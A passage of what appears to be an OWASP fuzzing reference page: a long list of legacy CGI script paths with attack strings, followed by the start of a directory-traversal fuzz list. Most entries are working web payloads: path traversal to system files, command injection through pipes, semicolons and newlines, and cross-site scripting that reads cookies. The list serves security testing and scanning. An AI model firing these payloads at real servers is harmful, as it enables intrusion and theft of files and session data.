betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
